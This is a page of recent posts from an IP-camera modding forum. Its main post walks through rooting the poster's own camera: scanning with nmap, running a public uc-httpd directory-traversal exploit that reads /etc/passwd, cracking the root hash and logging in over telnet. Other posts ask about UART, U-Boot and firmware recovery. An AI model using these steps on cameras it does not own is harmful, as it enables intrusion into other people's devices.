Recent Posts

Pages: 1 [2] 3 4 ... 10
11
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code: [Select]
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code: [Select]
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code: [Select]
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code: [Select]
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
12
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new about that module. I don't know how I do. Can you help me if you know something?

Also I want to use this module for image processing. There are some OS in that. How can I change some files in it? I wanna do some image processing with it. I need to do modification and add some code to OS. Can I do that?
13
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by admin on June 24, 2017, 05:00:51 am »
Not an error,  you're in the bootloader - u-boot.
You need to boot past that into the OS.


14
Firmware / Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 19, 2017, 06:41:23 am »
Hi everyone,
I tried access to Hi3516 in my camera module. I used from a link to do this.
Link: https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
I wanna access root but got an error.


System startup


U-Boot 2010.06 (Jun 28 2016 - 09:04:41)

Check Flash Memory Controller v100 ... Found
SPI Nor(cs 0) ID: 0xc2 0x20 0x18
Block:64KB Chip:16MB Name:"MX25L128XX"
SPI Nor total size: 16MB
MMC:   
EMMC/MMC/SD controller initialization.
Card did not respond to voltage select!
No EMMC/MMC/SD device found !
In:    serial
Out:   serial
Err:   serial
Hit any key to stop autoboot:  1 ... 0
hisilicon #
hisilicon # root
Unknown command 'root' - try 'help'
hisilicon #
hisilicon #


Any ideas to solve this error? I already apologize for my english.
15
Help / Any instant on cameras?
« Last post by SlowBro on June 13, 2017, 03:49:47 pm »
Are there any cameras that come on very quickly, or which can be put in deep sleep mode to wake quickly?

I'd like to create a wire-free battery-powered motion sensing setup. The motion could be detected via IR sensor and a microcontroller could start up a camera. Images would be transmitted over Wi-Fi or cellular.

If the Foscam-style cams offer sleep mode that could work.
16
General Discussion / Sannce I21AG Locking down
« Last post by widemouth on June 11, 2017, 08:40:20 am »
Thought I would post my experience with this camera.

On Bootup this camera attempt network connections to:

baidu.com
shifen.com
szxingweilai.cn
ec2-52-8-140-28.us-west-1.compute.amazonaws.com

And also directly attempts to connect to IP: 115.28.242.250

Horribly unsecure so it you have the ability to block these on your router then I suggest you do.

Other than that, it appears to be a good and cheap 720p camera.


17
Hacking & Modding / Re: H3518 / UART TxRx
« Last post by admin on May 31, 2017, 01:04:49 am »
HI3518

Look at the data sheet, and see what the RX / TX pins are, then follow those around the board to see if they end up anywhere accessible.

T19 / T18 according to the data sheet
http://www.datasheetspdf.com/PDF/Hi3518/853432/64

Also look at this -

https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
18
Hacking & Modding / H3518 / UART TxRx
« Last post by maxxxxpower on May 23, 2017, 10:34:59 am »
Have a FW issue with my camera. Need to get back in to it via serial to restore the FW. I don't seem to be able to find the UART TxRx on this board though. Can anyone help?

19
Similar Hardware / Please i need help with my FOSCAM 9821
« Last post by dumaster on May 15, 2017, 01:08:57 pm »
Please i need help with my FOSCAM 9821

My Foscam 9821 (plate FI9821A_MAIN_2V1 code) stopped working, as I am technician in electronics and have some maintenance equipment and decided to try to fix it, I made a serial connection to monitor the boot, to my surprise the initialization already hangs in the u- boot and does not enable or the option to enter the mode upload, I believe that the data in the flash memory SPI corrupted or it is damaged, I'm thinking of removing it from the board to make a re-programming and verification test, but it would need a complete DUMP ROM for this card model or similar, and that includes everything, kernel, root and also the u-boot, so I can use my programmer to reprogram the SPI memory and return life to my camera, please have someone to help me would be very grateful.

Eduardo Lopes  :)
20
Hacking & Modding / Please i need help with my FOSCAM 9821
« Last post by dumaster on May 15, 2017, 01:08:17 pm »
Please i need help with my FOSCAM 9821

My Foscam 9821 (plate FI9821A_MAIN_2V1 code) stopped working, as I am technician in electronics and have some maintenance equipment and decided to try to fix it, I made a serial connection to monitor the boot, to my surprise the initialization already hangs in the u- boot and does not enable or the option to enter the mode upload, I believe that the data in the flash memory SPI corrupted or it is damaged, I'm thinking of removing it from the board to make a re-programming and verification test, but it would need a complete DUMP ROM for this card model or similar, and that includes everything, kernel, root and also the u-boot, so I can use my programmer to reprogram the SPI memory and return life to my camera, please have someone to help me would be very grateful.

Eduardo Lopes  :)
Pages: 1 [2] 3 4 ... 10